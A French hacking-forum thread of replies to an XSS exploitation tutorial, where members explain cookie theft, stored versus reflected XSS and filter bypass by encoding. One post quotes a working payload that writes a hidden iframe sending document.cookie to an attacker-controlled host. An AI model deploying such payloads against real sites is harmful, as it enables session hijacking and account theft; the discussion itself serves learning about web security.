• STATISTIQUES
  • Il y a eu un total de 1 membres et 12790 visiteurs sur le site dans les dernières 24h pour un total de 12 791 personnes!


    Membres: 2 433
    Discussions: 3 585
    Messages: 32 831
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Listbrain Version 3
    Site proposant 66 challenges présentés dans une liste mélangée.
    Challenges
    [FR] Infomirmo
    Challenge présenté sous la forme de 6 niveaux de difficultés diverses et variées avec chacun plusieurs chall...
    Challenges
    [EN] HackQuest
    Logic: 12, JavaScript: 14, Applet: 6, CrackIt: 13, Crypto: 11, Internet: 3, Exploit: 7, Stegano: 12, Flash: 1, Programmi...
    Challenges
    [FR] Root-Me
    Notre équipe se base sur un constat : à l'heure actuelle ou l'information tend à devenir...
    Hacking
    [FR] Cyber-Hacker
    CH - Cyber Hacker est un jeu par navigateur de simulation de hack, programmez et envoyez vos virus et piratez les aut...
    Hacking
    [EN] Astalavista
    Un site aux ressources incontournable depuis plusieurs années, Astalavista est réellement devenue un cl...
    Hacking
    [EN] Framework Metasploit
    Le Framework Metasploit est un logiciel gratuit, open source de tests de pénétration développ&ea...
    Vulnérabilités

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 5 (2 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Comment est exploitée une faille XSS
31-12-2012, 13h19
Message : #16
supersnail Hors ligne
Éleveur d'ornithorynques
*******



Messages : 1,613
Sujets : 72
Points: 466
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Citation :Dans le fichier cookie.js, nous allons ouvrire un IFRAME qui inclura en variable le cookie de la personne. Voici le codage.

Code :
document.write('<iframe src=http://tonsite.com/cookie.php?cookie='+document.cookie+' HEIGHT=0 WIDTH=0></iframe>');

Je pense que ça répond à la question :>
Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
+1 (0) -1 (0) Répondre
31-12-2012, 13h21
Message : #17
Wabouz Hors ligne
Membre actif
*



Messages : 96
Sujets : 8
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
Nan justement c'est de là que vient ma question, doit-on créer ce fichier? ou est-ce qu'on le trouve à un endroit?
C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
+1 (0) -1 (0) Répondre
31-12-2012, 13h23
Message : #18
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
RE: Comment exploiter une faille XSS
On doit le créer il sert a recuperer le cookie via la fonction JAVASCRIPT : document.cookie puis fait une redirection sur une page avec le cookie en parametre GET (cf: GET et POST en PHP) Wink
+1 (0) -1 (0) Répondre
31-12-2012, 13h26
Message : #19
Wabouz Hors ligne
Membre actif
*



Messages : 96
Sujets : 8
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
D'accooooord, okay, merci beaucoup Smile
C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
+1 (0) -1 (0) Répondre
31-12-2012, 13h26
Message : #20
supersnail Hors ligne
Éleveur d'ornithorynques
*******



Messages : 1,613
Sujets : 72
Points: 466
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Ben le fichier cookie.js contient le code qui a été écrit (donc c'est à toi de le créer Wink ).

Enfin la faille elle permet à l'attaquant d'exécuter un javascript de son choix, qui peut être un "cookie stealer" (comme le montre CyberSee), mais sinon ça pourrait être un truc plus dangereux du genre une sorte de worm (comme a connu myspace y'a quelques années), ou pire, une sorte de page de "phishing" (principe en quelque sorte repris dans les "webinject" réalisés par les trojan de type banker, mais là je m'égare...).

Enfin bref, la XSS te permet d'exécuter n'importe quel bout de code JS de ton choix sur le site "victime" (bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )
Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
+1 (0) -1 (0) Répondre
03-01-2013, 15h19
Message : #21
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,721
Sujets : 287
Points: 158
Inscription : Jan 2012
RE: Comment est exploiter une faille XSS
Citation :(bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )

lol effectivement!
Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>
+1 (0) -1 (0) Répondre
06-01-2013, 11h30
Message : #22
Ettorhake Hors ligne
Newbie
*



Messages : 11
Sujets : 1
Points: 1
Inscription : Dec 2012
RE: Comment est exploiter une faille XSS
Merci pour le tuto CyberSee !
+1 (0) -1 (0) Répondre
10-01-2013, 13h52
Message : #23
freekiss Hors ligne
Newbie
*



Messages : 9
Sujets : 1
Points: 0
Inscription : Dec 2012
RE: Comment est exploiter une faille XSS
Merci pour ce tuto plus complet que ceux que l'on vois généralement.
+1 (0) -1 (0) Répondre
11-01-2013, 01h05
Message : #24
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: Comment est exploiter une faille XSS
A par le Cour qui est très bien le titre,lui, n'est pas très bien exprimé si je peux me permettre .. :p
Un "Comment exploiter une faille XSS" aurait été mieux Smile
+1 (0) -1 (0) Répondre
11-01-2013, 14h15
Message : #25
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Comment est exploiter une faille XSS
Sakiir, concernant le titre, c'était auparavant celui-là, mais il as était changer, car il mettez en doute l'orientation de la communauté.
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
11-01-2013, 17h28
Message : #26
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,721
Sujets : 287
Points: 158
Inscription : Jan 2012
RE: Comment est exploiter une faille XSS
Effectivement, c'est ce que j'avais mis au départ ;-)
Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>
+1 (0) -1 (0) Répondre
11-01-2013, 17h50
Message : #27
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
RE: Comment est exploiter une faille XSS
Alors on pourrais le changer en "Comment est exploitée une faille XSS" d'ailleurs le titre sur le forum est different de celui qui s'affiche sur la page :

Comment est exploiter une faille XSS
RE: Comment exploiter une faille XSS
+1 (0) -1 (0) Répondre
11-01-2013, 20h25
Message : #28
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: Comment est exploiter une faille XSS
ah oui je comprend , enfin c'est exploité quand même :p
+1 (0) -1 (0) Répondre
03-06-2013, 16h32
Message : #29
0pc0deFR
Non-enregistré



 
RE: Comment est exploitée une faille XSS
Sorry pour le déterrage. Régulièrement, des sites utilisent des systèmes de remplacement de caractère pour empêcher l'XSS. Souvent <h1>XSS</h1> va ce transformer en quelque chose comme _h1_XSS_/h1_. Pour bypasser ce genre de système, vous pouvez encoder votre requête: escape html.

A noter que le javascript n'est pas le seul moyen d'exploiter une XSS. Tout langage exécuté coté client peut exploiter une XSS. La balise <h1>XSS</h1> exploit potentiellement une vulnérabilité XSS même si l'intérêt est limité. Les Iframes font des dégâts.

Aussi, il existe deux types d'XSS. Les XSS qu'on retrouve souvent dans les fonctions recherches sont les XSS non stockées, cela signifie que l'exploitation de l'XSS n'est pas systématique ainsi que les XSS stockées, elles seront exécutés à chaque chargement de la page. Elles sont souvent stockées en base de données.
positive (0) negative (0) Répondre
03-06-2013, 19h06
Message : #30
CronosDark Hors ligne
Newbie
*



Messages : 5
Sujets : 1
Points: 1
Inscription : Jun 2013
RE: Comment est exploitée une faille XSS
Merci pour les TRES bon tutoriel ! =)
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  Comment exploiter une faille SQL Injection CyberSee 33 11,161 22-09-2015, 21h53
Dernier message: CyberSee
  [Tuto]Faille CRLF OverDreams 15 4,634 18-06-2013, 12h33
Dernier message: Hypnoze57
  [Faille WEB] LFI Swissky 10 3,029 25-02-2013, 22h04
Dernier message: InstinctHack
  [Faille Web] Full Path Disclosure Swissky 4 1,639 07-12-2012, 08h52
Dernier message: Shirobi
  Comment utiliser Metasploit EpicOut 4 1,521 15-09-2012, 20h47
Dernier message: Swissky
  Comment fonctionne les attaques de type IP-Spoofing Apophis 4 1,719 18-02-2007, 12h38
Dernier message: shutdownfuri

Atteindre :


Utilisateur(s) parcourant ce sujet : 16 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut